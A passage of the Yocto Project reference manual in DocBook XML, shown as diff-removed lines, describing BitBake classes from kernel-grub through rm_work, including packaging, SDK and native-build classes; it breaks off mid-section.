-<section id='ref-classes-kernel-grub'>
- <title><filename>kernel-grub.bbclass</filename></title>
-
- <para>
- The <filename>kernel-grub</filename> class updates the boot area and
- the boot menu with the kernel as the priority boot mechanism while
- installing a RPM to update the kernel on a deployed target.
- </para>
-</section>
-
-<section id='ref-classes-kernel-module-split'>
- <title><filename>kernel-module-split.bbclass</filename></title>
-
- <para>
- The <filename>kernel-module-split</filename> class
- provides common functionality for splitting Linux kernel modules into
- separate packages.
- </para>
-</section>
-
-<section id='ref-classes-kernel-uboot'>
- <title><filename>kernel-uboot.bbclass</filename></title>
-
- <para>
- The <filename>kernel-uboot</filename> class provides support for
- building from vmlinux-style kernel sources.
- </para>
-</section>
-
-<section id='ref-classes-kernel-uimage'>
- <title><filename>kernel-uimage.bbclass</filename></title>
-
- <para>
- The <filename>kernel-uimage</filename> class provides support to
- pack uImage.
- </para>
-</section>
-
-<section id='ref-classes-kernel-yocto'>
- <title><filename>kernel-yocto.bbclass</filename></title>
-
- <para>
- The <filename>kernel-yocto</filename> class
- provides common functionality for building from linux-yocto style
- kernel source repositories.
- </para>
-</section>
-
-<section id='ref-classes-kernelsrc'>
- <title><filename>kernelsrc.bbclass</filename></title>
-
- <para>
- The <filename>kernelsrc</filename> class sets the Linux kernel
- source and version.
- </para>
-</section>
-
-<section id='ref-classes-lib_package'>
- <title><filename>lib_package.bbclass</filename></title>
-
- <para>
- The <filename>lib_package</filename> class
- supports recipes that build libraries and produce executable
- binaries, where those binaries should not be installed by default
- along with the library.
- Instead, the binaries are added to a separate
- <filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}-bin</filename>
- package to make their installation optional.
- </para>
-</section>
-
-<section id='ref-classes-libc*'>
- <title><filename>libc*.bbclass</filename></title>
-
- <para>
- The <filename>libc*</filename> classes support recipes that build
- packages with <filename>libc</filename>:
- <itemizedlist>
- <listitem><para>The <filename>libc-common</filename> class
- provides common support for building with
- <filename>libc</filename>.
- </para></listitem>
- <listitem><para>The <filename>libc-package</filename> class
- supports packaging up <filename>glibc</filename> and
- <filename>eglibc</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='ref-classes-license'>
- <title><filename>license.bbclass</filename></title>
-
- <para>
- The <filename>license</filename> class provides license
- manifest creation and license exclusion.
- This class is enabled by default using the default value for the
- <link linkend='var-INHERIT_DISTRO'><filename>INHERIT_DISTRO</filename></link>
- variable.
- </para>
-</section>
-
-<section id='ref-classes-linux-kernel-base'>
- <title><filename>linux-kernel-base.bbclass</filename></title>
-
- <para>
- The <filename>linux-kernel-base</filename> class
- provides common functionality for recipes that build out of the Linux
- kernel source tree.
- These builds goes beyond the kernel itself.
- For example, the Perf recipe also inherits this class.
- </para>
-</section>
-
-<section id='ref-classes-linuxloader'>
- <title><filename>linuxloader.bbclass</filename></title>
-
- <para>
- Provides the function <filename>linuxloader()</filename>, which gives
- the value of the dynamic loader/linker provided on the platform.
- This value is used by a number of other classes.
- </para>
-</section>
-
-<section id='ref-classes-logging'>
- <title><filename>logging.bbclass</filename></title>
-
- <para>
- The <filename>logging</filename> class provides the standard
- shell functions used to log messages for various BitBake severity levels
- (i.e. <filename>bbplain</filename>, <filename>bbnote</filename>,
- <filename>bbwarn</filename>, <filename>bberror</filename>,
- <filename>bbfatal</filename>, and <filename>bbdebug</filename>).
- </para>
-
- <para>
- This class is enabled by default since it is inherited by
- the <filename>base</filename> class.
- </para>
-</section>
-
-<section id='ref-classes-meta'>
- <title><filename>meta.bbclass</filename></title>
-
- <para>
- The <filename>meta</filename> class is inherited by recipes
- that do not build any output packages themselves, but act as a "meta"
- target for building other recipes.
- </para>
-</section>
-
-<section id='ref-classes-metadata_scm'>
- <title><filename>metadata_scm.bbclass</filename></title>
-
- <para>
- The <filename>metadata_scm</filename> class provides functionality for
- querying the branch and revision of a Source Code Manager (SCM)
- repository.
- </para>
-
- <para>
- The <link linkend='ref-classes-base'><filename>base</filename></link>
- class uses this class to print the revisions of each layer before
- starting every build.
- The <filename>metadata_scm</filename> class is enabled by default
- because it is inherited by the <filename>base</filename> class.
- </para>
-</section>
-
-<section id='ref-classes-migrate_localcount'>
- <title><filename>migrate_localcount.bbclass</filename></title>
-
- <para>
- The <filename>migrate_localcount</filename> class verifies a recipe's
- localcount data and increments it appropriately.
- </para>
-</section>
-
-<section id='ref-classes-mime'>
- <title><filename>mime.bbclass</filename></title>
-
- <para>
- The <filename>mime</filename> class generates the proper
- post-install and post-remove (postinst/postrm) scriptlets for packages
- that install MIME type files.
- These scriptlets call <filename>update-mime-database</filename> to add
- the MIME types to the shared database.
- </para>
-</section>
-
-<section id='ref-classes-mirrors'>
- <title><filename>mirrors.bbclass</filename></title>
-
- <para>
- The <filename>mirrors</filename> class sets up some standard
- <link linkend='var-MIRRORS'><filename>MIRRORS</filename></link> entries
- for source code mirrors.
- These mirrors provide a fall-back path in case the upstream source
- specified in
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
- within recipes is unavailable.
- </para>
-
- <para>
- This class is enabled by default since it is inherited by the
- <link linkend='ref-classes-base'><filename>base</filename></link> class.
- </para>
-</section>
-
-<section id='ref-classes-module'>
- <title><filename>module.bbclass</filename></title>
-
- <para>
- The <filename>module</filename> class provides support for building
- out-of-tree Linux kernel modules.
- The class inherits the
- <link linkend='ref-classes-module-base'><filename>module-base</filename></link>
- and
- <link linkend='ref-classes-kernel-module-split'><filename>kernel-module-split</filename></link>
- classes, and implements the
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>
- and
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- tasks.
- The class provides everything needed to build and package a kernel
- module.
- </para>
-
- <para>
- For general information on out-of-tree Linux kernel modules, see the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#incorporating-out-of-tree-modules'>Incorporating Out-of-Tree Modules</ulink>"
- section in the Yocto Project Linux Kernel Development Manual.
- </para>
-</section>
-
-<section id='ref-classes-module-base'>
- <title><filename>module-base.bbclass</filename></title>
-
- <para>
- The <filename>module-base</filename> class provides the base
- functionality for building Linux kernel modules.
- Typically, a recipe that builds software that includes one or
- more kernel modules and has its own means of building
- the module inherits this class as opposed to inheriting the
- <link linkend='ref-classes-module'><filename>module</filename></link>
- class.
- </para>
-</section>
-
-<section id='ref-classes-multilib*'>
- <title><filename>multilib*.bbclass</filename></title>
-
- <para>
- The <filename>multilib*</filename> classes provide support
- for building libraries with different target optimizations or target
- architectures and installing them side-by-side in the same image.
- </para>
-
- <para>
- For more information on using the Multilib feature, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#combining-multiple-versions-library-files-into-one-image'>Combining Multiple Versions of Library Files into One Image</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-</section>
-
-<section id='ref-classes-native'>
- <title><filename>native.bbclass</filename></title>
-
- <para>
- The <filename>native</filename> class provides common
- functionality for recipes that build tools to run on the
- <link linkend='hardware-build-system-term'>build host</link>
- (i.e. tools that use the compiler or other tools from the
- build host).
- </para>
-
- <para>
- You can create a recipe that builds tools that run natively on the
- host a couple different ways:
- <itemizedlist>
- <listitem><para>
- Create a
- <replaceable>myrecipe</replaceable><filename>-native.bb</filename>
- recipe that inherits the <filename>native</filename> class.
- If you use this method, you must order the inherit statement
- in the recipe after all other inherit statements so that the
- <filename>native</filename> class is inherited last.
- <note><title>Warning</title>
- When creating a recipe this way, the recipe name must
- follow this naming convention:
- <literallayout class='monospaced'>
- <replaceable>myrecipe</replaceable>-native.bb
- </literallayout>
- Not using this naming convention can lead to subtle
- problems caused by existing code that depends on that
- naming convention.
- </note>
- </para></listitem>
- <listitem><para>
- Create or modify a target recipe that contains the following:
- <literallayout class='monospaced'>
- <link linkend='var-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></link> = "native"
- </literallayout>
- Inside the recipe, use <filename>_class-native</filename> and
- <filename>_class-target</filename> overrides to specify any
- functionality specific to the respective native or target
- case.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Although applied differently, the <filename>native</filename> class is
- used with both methods.
- The advantage of the second method is that you do not need to have two
- separate recipes (assuming you need both) for native and target.
- All common parts of the recipe are automatically shared.
- </para>
-</section>
-
-<section id='ref-classes-nativesdk'>
- <title><filename>nativesdk.bbclass</filename></title>
-
- <para>
- The <filename>nativesdk</filename> class provides common
- functionality for recipes that wish to build tools to run as part of
- an SDK (i.e. tools that run on
- <link linkend='var-SDKMACHINE'><filename>SDKMACHINE</filename></link>).
- </para>
-
- <para>
- You can create a recipe that builds tools that run on the SDK machine
- a couple different ways:
- <itemizedlist>
- <listitem><para>Create a
- <filename>nativesdk-</filename><replaceable>myrecipe</replaceable><filename>.bb</filename>
- recipe that inherits the <filename>nativesdk</filename> class.
- If you use this method, you must order the inherit statement
- in the recipe after all other inherit statements so that the
- <filename>nativesdk</filename> class is inherited last.
- </para></listitem>
- <listitem><para>Create a <filename>nativesdk</filename> variant
- of any recipe by adding the following:
- <literallayout class='monospaced'>
- <link linkend='var-BBCLASSEXTEND'><filename>BBCLASSEXTEND</filename></link> = "nativesdk"
- </literallayout>
- Inside the recipe, use <filename>_class-nativesdk</filename> and
- <filename>_class-target</filename> overrides to specify any
- functionality specific to the respective SDK machine or target
- case.</para></listitem>
- </itemizedlist>
- <note><title>Warning</title>
- When creating a recipe, you must follow this naming convention:
- <literallayout class='monospaced'>
- nativesdk-<replaceable>myrecipe</replaceable>.bb
- </literallayout>
- Not doing so can lead to subtle problems because code exists
- that depends on the naming convention.
- </note>
- </para>
-
- <para>
- Although applied differently, the <filename>nativesdk</filename> class
- is used with both methods.
- The advantage of the second method is that you do not need to have two
- separate recipes (assuming you need both) for the SDK machine and the
- target.
- All common parts of the recipe are automatically shared.
- </para>
-</section>
-
-<section id='ref-classes-nopackages'>
- <title><filename>nopackages.bbclass</filename></title>
-
- <para>
- Disables packaging tasks for those recipes and classes where
- packaging is not needed.
- </para>
-</section>
-
-<section id='ref-classes-npm'>
- <title><filename>npm.bbclass</filename></title>
-
- <para>
- Provides support for building Node.js software fetched using the
- <ulink url='https://en.wikipedia.org/wiki/Npm_(software)'>node package manager (NPM)</ulink>.
- <note>
- Currently, recipes inheriting this class must use the
- <filename>npm://</filename> fetcher to have dependencies fetched
- and packaged automatically.
- </note>
- For information on how to create NPM packages, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-node-package-manager-npm-packages'>Creating Node Package Manager (NPM) Packages</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-</section>
-
-<section id='ref-classes-oelint'>
- <title><filename>oelint.bbclass</filename></title>
-
- <para>
- The <filename>oelint</filename> class is an
- obsolete lint checking tool that exists in
- <filename>meta/classes</filename> in the
- <link linkend='source-directory'>Source Directory</link>.
- </para>
-
- <para>
- A number of classes exist that could be generally useful in
- OE-Core but are never actually used within OE-Core itself.
- The <filename>oelint</filename> class is one such example.
- However, being aware of this class can reduce the proliferation of
- different versions of similar classes across multiple layers.
- </para>
-</section>
-
-<section id='ref-classes-own-mirrors'>
- <title><filename>own-mirrors.bbclass</filename></title>
-
- <para>
- The <filename>own-mirrors</filename> class makes it
- easier to set up your own
- <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>
- from which to first fetch source before attempting to fetch it from the
- upstream specified in
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
- within each recipe.
- </para>
-
- <para>
- To use this class, inherit it globally and specify
- <link linkend='var-SOURCE_MIRROR_URL'><filename>SOURCE_MIRROR_URL</filename></link>.
- Here is an example:
- <literallayout class='monospaced'>
- INHERIT += "own-mirrors"
- SOURCE_MIRROR_URL = "http://example.com/my-source-mirror"
- </literallayout>
- You can specify only a single URL in
- <filename>SOURCE_MIRROR_URL</filename>.
- </para>
-</section>
-
-<section id='ref-classes-package'>
- <title><filename>package.bbclass</filename></title>
-
- <para>
- The <filename>package</filename> class supports generating
- packages from a build's output.
- The core generic functionality is in
- <filename>package.bbclass</filename>.
- The code specific to particular package types resides in these
- package-specific classes:
- <link linkend='ref-classes-package_deb'><filename>package_deb</filename></link>,
- <link linkend='ref-classes-package_rpm'><filename>package_rpm</filename></link>,
- <link linkend='ref-classes-package_ipk'><filename>package_ipk</filename></link>,
- and
- <link linkend='ref-classes-package_tar'><filename>package_tar</filename></link>.
- <note><title>Warning</title>
- The <filename>package_tar</filename> class is broken and not
- supported.
- It is recommended that you do not use this class.
- </note>
- </para>
-
- <para>
- You can control the list of resulting package formats by using the
- <filename><link linkend='var-PACKAGE_CLASSES'>PACKAGE_CLASSES</link></filename>
- variable defined in your <filename>conf/local.conf</filename>
- configuration file, which is located in the
- <link linkend='build-directory'>Build Directory</link>.
- When defining the variable, you can specify one or more package types.
- Since images are generated from packages, a packaging class is
- needed to enable image generation.
- The first class listed in this variable is used for image generation.
- </para>
-
- <para>
- If you take the optional step to set up a repository (package feed)
- on the development host that can be used by DNF, you can
- install packages from the feed while you are running the image
- on the target (i.e. runtime installation of packages).
- For more information, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#using-runtime-package-management'>Using Runtime Package Management</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- The package-specific class you choose can affect build-time performance
- and has space ramifications.
- In general, building a package with IPK takes about thirty percent less
- time as compared to using RPM to build the same or similar package.
- This comparison takes into account a complete build of the package with
- all dependencies previously built.
- The reason for this discrepancy is because the RPM package manager
- creates and processes more
- <link linkend='metadata'>Metadata</link> than the
- IPK package manager.
- Consequently, you might consider setting
- <filename>PACKAGE_CLASSES</filename> to "package_ipk" if you are
- building smaller systems.
- </para>
-
- <para>
- Before making your package manager decision, however, you should
- consider some further things about using RPM:
- <itemizedlist>
- <listitem><para>
- RPM starts to provide more abilities than IPK due to
- the fact that it processes more Metadata.
- For example, this information includes individual file types,
- file checksum generation and evaluation on install, sparse file
- support, conflict detection and resolution for Multilib systems,
- ACID style upgrade, and repackaging abilities for rollbacks.
- </para></listitem>
- <listitem><para>
- For smaller systems, the extra space used for the Berkeley
- Database and the amount of metadata when using RPM can affect
- your ability to perform on-device upgrades.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- You can find additional information on the effects of the package
- class at these two Yocto Project mailing list links:
- <itemizedlist>
- <listitem><para><ulink url='&YOCTO_LISTS_URL;/pipermail/poky/2011-May/006362.html'>
- https://lists.yoctoproject.org/pipermail/poky/2011-May/006362.html</ulink></para></listitem>
- <listitem><para><ulink url='&YOCTO_LISTS_URL;/pipermail/poky/2011-May/006363.html'>
- https://lists.yoctoproject.org/pipermail/poky/2011-May/006363.html</ulink></para></listitem>
- </itemizedlist>
- </para>
-</section>
-
-<section id='ref-classes-package_deb'>
- <title><filename>package_deb.bbclass</filename></title>
-
- <para>
- The <filename>package_deb</filename> class
- provides support for creating packages that use the Debian
- (i.e. <filename>.deb</filename>) file format.
- The class ensures the packages are written out in a
- <filename>.deb</filename> file format to the
- <filename>${</filename><link linkend='var-DEPLOY_DIR_DEB'><filename>DEPLOY_DIR_DEB</filename></link><filename>}</filename>
- directory.
- </para>
-
- <para>
- This class inherits the
- <link linkend='ref-classes-package'><filename>package</filename></link>
- class and is enabled through the
- <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
- variable in the <filename>local.conf</filename> file.
- </para>
-</section>
-
-<section id='ref-classes-package_ipk'>
- <title><filename>package_ipk.bbclass</filename></title>
-
- <para>
- The <filename>package_ipk</filename> class
- provides support for creating packages that use the IPK
- (i.e. <filename>.ipk</filename>) file format.
- The class ensures the packages are written out in a
- <filename>.ipk</filename> file format to the
- <filename>${</filename><link linkend='var-DEPLOY_DIR_IPK'><filename>DEPLOY_DIR_IPK</filename></link><filename>}</filename>
- directory.
- </para>
-
- <para>
- This class inherits the
- <link linkend='ref-classes-package'><filename>package</filename></link>
- class and is enabled through the
- <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
- variable in the <filename>local.conf</filename> file.
- </para>
-</section>
-
-<section id='ref-classes-package_rpm'>
- <title><filename>package_rpm.bbclass</filename></title>
-
- <para>
- The <filename>package_rpm</filename> class
- provides support for creating packages that use the RPM
- (i.e. <filename>.rpm</filename>) file format.
- The class ensures the packages are written out in a
- <filename>.rpm</filename> file format to the
- <filename>${</filename><link linkend='var-DEPLOY_DIR_RPM'><filename>DEPLOY_DIR_RPM</filename></link><filename>}</filename>
- directory.
- </para>
-
- <para>
- This class inherits the
- <link linkend='ref-classes-package'><filename>package</filename></link>
- class and is enabled through the
- <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
- variable in the <filename>local.conf</filename> file.
- </para>
-</section>
-
-<section id='ref-classes-package_tar'>
- <title><filename>package_tar.bbclass</filename></title>
-
- <para>
- The <filename>package_tar</filename> class
- provides support for creating tarballs.
- The class ensures the packages are written out in a
- tarball format to the
- <filename>${</filename><link linkend='var-DEPLOY_DIR_TAR'><filename>DEPLOY_DIR_TAR</filename></link><filename>}</filename>
- directory.
- </para>
-
- <para>
- This class inherits the
- <link linkend='ref-classes-package'><filename>package</filename></link>
- class and is enabled through the
- <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
- variable in the <filename>local.conf</filename> file.
- <note>
- You cannot specify the <filename>package_tar</filename> class
- first using the <filename>PACKAGE_CLASSES</filename> variable.
- You must use <filename>.deb</filename>,
- <filename>.ipk</filename>, or <filename>.rpm</filename> file
- formats for your image or SDK.
- </note>
- </para>
-</section>
-
-<section id='ref-classes-packagedata'>
- <title><filename>packagedata.bbclass</filename></title>
-
- <para>
- The <filename>packagedata</filename> class provides
- common functionality for reading <filename>pkgdata</filename> files
- found in
- <link linkend='var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></link>.
- These files contain information about each output package produced by
- the OpenEmbedded build system.
- </para>
-
- <para>
- This class is enabled by default because it is inherited by the
- <link linkend='ref-classes-package'><filename>package</filename></link>
- class.
- </para>
-</section>
-
-<section id='ref-classes-packagegroup'>
- <title><filename>packagegroup.bbclass</filename></title>
-
- <para>
- The <filename>packagegroup</filename> class sets default values
- appropriate for package group recipes (e.g.
- <filename><link linkend='var-PACKAGES'>PACKAGES</link></filename>,
- <filename><link linkend='var-PACKAGE_ARCH'>PACKAGE_ARCH</link></filename>,
- <filename><link linkend='var-ALLOW_EMPTY'>ALLOW_EMPTY</link></filename>,
- and so forth).
- It is highly recommended that all package group recipes inherit this class.
- </para>
-
- <para>
- For information on how to use this class, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#usingpoky-extend-customimage-customtasks'>Customizing Images Using Custom Package Groups</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- Previously, this class was called the <filename>task</filename> class.
- </para>
-</section>
-
-<section id='ref-classes-patch'>
- <title><filename>patch.bbclass</filename></title>
-
- <para>
- The <filename>patch</filename> class provides all functionality for
- applying patches during the
- <link linkend='ref-tasks-patch'><filename>do_patch</filename></link>
- task.
- </para>
-
- <para>
- This class is enabled by default because it is inherited by the
- <link linkend='ref-classes-base'><filename>base</filename></link>
- class.
- </para>
-</section>
-
-<section id='ref-classes-perlnative'>
- <title><filename>perlnative.bbclass</filename></title>
-
- <para>
- When inherited by a recipe, the <filename>perlnative</filename> class
- supports using the native version of Perl built by the build system
- rather than using the version provided by the build host.
- </para>
-</section>
-
-<section id='ref-classes-pixbufcache'>
- <title><filename>pixbufcache.bbclass</filename></title>
-
- <para>
- The <filename>pixbufcache</filename> class generates the proper
- post-install and post-remove (postinst/postrm) scriptlets for packages
- that install pixbuf loaders, which are used with
- <filename>gdk-pixbuf</filename>.
- These scriptlets call <filename>update_pixbuf_cache</filename>
- to add the pixbuf loaders to the cache.
- Since the cache files are architecture-specific,
- <filename>update_pixbuf_cache</filename> is run using QEMU if the
- postinst scriptlets need to be run on the build host during image
- creation.
- </para>
-
- <para>
- If the pixbuf loaders being installed are in packages other
- than the recipe's main package, set
- <link linkend='var-PIXBUF_PACKAGES'><filename>PIXBUF_PACKAGES</filename></link>
- to specify the packages containing the loaders.
- </para>
-</section>
-
-<section id='ref-classes-pkgconfig'>
- <title><filename>pkgconfig.bbclass</filename></title>
-
- <para>
- The <filename>pkgconfig</filename> class provides a standard way to get
- header and library information by using <filename>pkg-config</filename>.
- This class aims to smooth integration of
- <filename>pkg-config</filename> into libraries that use it.
- </para>
-
- <para>
- During staging, BitBake installs <filename>pkg-config</filename>
- data into the <filename>sysroots/</filename> directory.
- By making use of sysroot functionality within
- <filename>pkg-config</filename>, the <filename>pkgconfig</filename>
- class no longer has to manipulate the files.
- </para>
-</section>
-
-<section id='ref-classes-populate-sdk'>
- <title><filename>populate_sdk.bbclass</filename></title>
-
- <para>
- The <filename>populate_sdk</filename> class provides support for
- SDK-only recipes.
- For information on advantages gained when building a cross-development
- toolchain using the
- <link linkend='ref-tasks-populate_sdk'><filename>do_populate_sdk</filename></link>
- task, see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-building-an-sdk-installer'>Building an SDK Installer</ulink>"
- section in the Yocto Project Application Development and the
- Extensible Software Development Kit (eSDK) manual.
- </para>
-</section>
-
-<section id='ref-classes-populate-sdk-*'>
- <title><filename>populate_sdk_*.bbclass</filename></title>
-
- <para>
- The <filename>populate_sdk_*</filename> classes support SDK creation
- and consist of the following classes:
- <itemizedlist>
- <listitem><para><emphasis><filename>populate_sdk_base</filename>:</emphasis>
- The base class supporting SDK creation under all package
- managers (i.e. DEB, RPM, and opkg).</para></listitem>
- <listitem><para><emphasis><filename>populate_sdk_deb</filename>:</emphasis>
- Supports creation of the SDK given the Debian package manager.
- </para></listitem>
- <listitem><para><emphasis><filename>populate_sdk_rpm</filename>:</emphasis>
- Supports creation of the SDK given the RPM package manager.
- </para></listitem>
- <listitem><para><emphasis><filename>populate_sdk_ipk</filename>:</emphasis>
- Supports creation of the SDK given the opkg (IPK format)
- package manager.
- </para></listitem>
- <listitem><para><emphasis><filename>populate_sdk_ext</filename>:</emphasis>
- Supports extensible SDK creation under all package managers.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The <filename>populate_sdk_base</filename> class inherits the
- appropriate <filename>populate_sdk_*</filename> (i.e.
- <filename>deb</filename>, <filename>rpm</filename>, and
- <filename>ipk</filename>) based on
- <link linkend='var-IMAGE_PKGTYPE'><filename>IMAGE_PKGTYPE</filename></link>.
- </para>
-
- <para>
- The base class ensures all source and destination directories are
- established and then populates the SDK.
- After populating the SDK, the <filename>populate_sdk_base</filename>
- class constructs two sysroots:
- <filename>${</filename><link linkend='var-SDK_ARCH'><filename>SDK_ARCH</filename></link><filename>}-nativesdk</filename>,
- which contains the cross-compiler and associated tooling, and the
- target, which contains a target root filesystem that is configured for
- the SDK usage.
- These two images reside in
- <link linkend='var-SDK_OUTPUT'><filename>SDK_OUTPUT</filename></link>,
- which consists of the following:
- <literallayout class='monospaced'>
- ${SDK_OUTPUT}/${SDK_ARCH}<replaceable>-nativesdk-pkgs</replaceable>
- ${SDK_OUTPUT}/${SDKTARGETSYSROOT}/<replaceable>target-pkgs</replaceable>
- </literallayout>
- </para>
-
- <para>
- Finally, the base populate SDK class creates the toolchain
- environment setup script, the tarball of the SDK, and the installer.
- </para>
-
- <para>
- The respective <filename>populate_sdk_deb</filename>,
- <filename>populate_sdk_rpm</filename>, and
- <filename>populate_sdk_ipk</filename> classes each support the
- specific type of SDK.
- These classes are inherited by and used with the
- <filename>populate_sdk_base</filename> class.
- </para>
-
- <para>
- For more information on the cross-development toolchain
- generation, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#cross-development-toolchain-generation'>Cross-Development Toolchain Generation</ulink>"
- section in the Yocto Project Overview and Concepts Manual.
- For information on advantages gained when building a
- cross-development toolchain using the
- <link linkend='ref-tasks-populate_sdk'><filename>do_populate_sdk</filename></link>
- task, see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-building-an-sdk-installer'>Building an SDK Installer</ulink>"
- section in the Yocto Project Application Development and the
- Extensible Software Development Kit (eSDK) manual.
- </para>
-</section>
-
-<section id='ref-classes-prexport'>
- <title><filename>prexport.bbclass</filename></title>
-
- <para>
- The <filename>prexport</filename> class provides functionality for
- exporting
- <link linkend='var-PR'><filename>PR</filename></link> values.
- <note>
- This class is not intended to be used directly.
- Rather, it is enabled when using
- "<filename>bitbake-prserv-tool export</filename>".
- </note>
- </para>
-</section>
-
-<section id='ref-classes-primport'>
- <title><filename>primport.bbclass</filename></title>
-
- <para>
- The <filename>primport</filename> class provides functionality for
- importing
- <link linkend='var-PR'><filename>PR</filename></link> values.
- <note>
- This class is not intended to be used directly.
- Rather, it is enabled when using
- "<filename>bitbake-prserv-tool import</filename>".
- </note>
- </para>
-</section>
-
-<section id='ref-classes-prserv'>
- <title><filename>prserv.bbclass</filename></title>
-
- <para>
- The <filename>prserv</filename> class provides functionality for
- using a
- <ulink url='&YOCTO_DOCS_DEV_URL;#working-with-a-pr-service'>PR service</ulink>
- in order to automatically manage the incrementing of the
- <link linkend='var-PR'><filename>PR</filename></link> variable for
- each recipe.
- </para>
-
- <para>
- This class is enabled by default because it is inherited by the
- <link linkend='ref-classes-package'><filename>package</filename></link>
- class.
- However, the OpenEmbedded build system will not enable the
- functionality of this class unless
- <link linkend='var-PRSERV_HOST'><filename>PRSERV_HOST</filename></link>
- has been set.
- </para>
-</section>
-
-<section id='ref-classes-ptest'>
- <title><filename>ptest.bbclass</filename></title>
-
- <para>
- The <filename>ptest</filename> class provides functionality for
- packaging and installing runtime tests for recipes that build software
- that provides these tests.
- </para>
-
- <para>
- This class is intended to be inherited by individual recipes.
- However, the class' functionality is largely disabled unless "ptest"
- appears in
- <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'>Testing Packages With ptest</ulink>"
- section in the Yocto Project Development Tasks Manual for more
- information on ptest.
- </para>
-</section>
-
-<section id='ref-classes-ptest-gnome'>
- <title><filename>ptest-gnome.bbclass</filename></title>
-
- <para>
- Enables package tests (ptests) specifically for GNOME packages,
- which have tests intended to be executed with
- <filename>gnome-desktop-testing</filename>.
- </para>
-
- <para>
- For information on setting up and running ptests, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'>Testing Packages With ptest</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-</section>
-
-<section id='ref-classes-python-dir'>
- <title><filename>python-dir.bbclass</filename></title>
-
- <para>
- The <filename>python-dir</filename> class provides the base version,
- location, and site package location for Python.
- </para>
-</section>
-
-<section id='ref-classes-python3native'>
- <title><filename>python3native.bbclass</filename></title>
-
- <para>
- The <filename>python3native</filename> class supports using the
- native version of Python 3 built by the build system rather than
- support of the version provided by the build host.
- </para>
-</section>
-
-<section id='ref-classes-pythonnative'>
- <title><filename>pythonnative.bbclass</filename></title>
-
- <para>
- When inherited by a recipe, the <filename>pythonnative</filename> class
- supports using the native version of Python built by the build system
- rather than using the version provided by the build host.
- </para>
-</section>
-
-<section id='ref-classes-qemu'>
- <title><filename>qemu.bbclass</filename></title>
-
- <para>
- The <filename>qemu</filename> class provides functionality for recipes
- that either need QEMU or test for the existence of QEMU.
- Typically, this class is used to run programs for a target system on
- the build host using QEMU's application emulation mode.
- </para>
-</section>
-
-<section id='ref-classes-recipe_sanity'>
- <title><filename>recipe_sanity.bbclass</filename></title>
-
- <para>
- The <filename>recipe_sanity</filename> class checks for the presence
- of any host system recipe prerequisites that might affect the
- build (e.g. variables that are set or software that is present).
- </para>
-</section>
-
-<section id='ref-classes-relocatable'>
- <title><filename>relocatable.bbclass</filename></title>
-
- <para>
- The <filename>relocatable</filename> class enables relocation of
- binaries when they are installed into the sysroot.
- </para>
-
- <para>
- This class makes use of the
- <link linkend='ref-classes-chrpath'><filename>chrpath</filename></link>
- class and is used by both the
- <link linkend='ref-classes-cross'><filename>cross</filename></link>
- and
- <link linkend='ref-classes-native'><filename>native</filename></link>
- classes.
- </para>
-</section>
-
-<section id='ref-classes-remove-libtool'>
- <title><filename>remove-libtool.bbclass</filename></title>
-
- <para>
- The <filename>remove-libtool</filename> class adds a post function
- to the
- <link linkend='ref-tasks-install'><filename>do_install</filename></link>
- task to remove all <filename>.la</filename> files installed by
- <filename>libtool</filename>.
- Removing these files results in them being absent from both the
- sysroot and target packages.
- </para>
-
- <para>
- If a recipe needs the <filename>.la</filename> files to be installed,
- then the recipe can override the removal by setting
- <filename>REMOVE_LIBTOOL_LA</filename> to "0" as follows:
- <literallayout class='monospaced'>
- REMOVE_LIBTOOL_LA = "0"
- </literallayout>
- <note>
- The <filename>remove-libtool</filename> class is not enabled by
- default.
- </note>
- </para>
-</section>
-
-<section id='ref-classes-report-error'>
- <title><filename>report-error.bbclass</filename></title>
-
- <para>
- The <filename>report-error</filename> class supports enabling the
- <ulink url='&YOCTO_DOCS_DEV_URL;#using-the-error-reporting-tool'>error reporting tool</ulink>,
- which allows you to submit build error information to a central
- database.
- </para>
-
- <para>
- The class collects debug information for recipe, recipe version, task,
- machine, distro, build system, target system, host distro, branch,
- commit, and log.
- From the information, report files using a JSON format are created and
- stored in
- <filename>${</filename><link linkend='var-LOG_DIR'><filename>LOG_DIR</filename></link><filename>}/error-report</filename>.
- </para>
-</section>
-
-<section id='ref-classes-rm-work'>
- <title><filename>rm_work.bbclass</filename></title>
-
- <para>
- The <filename>rm_work</filename> class supports deletion of temporary
- workspace, which can ease your hard drive demands during builds.
- </para>
-
- <para>
- The OpenEmbedded build system can use a substantial amount of disk
- space during the build process.
- A portion of this space is the work files under the
- <filename>${TMPDIR}/work</filename> directory for each recipe.
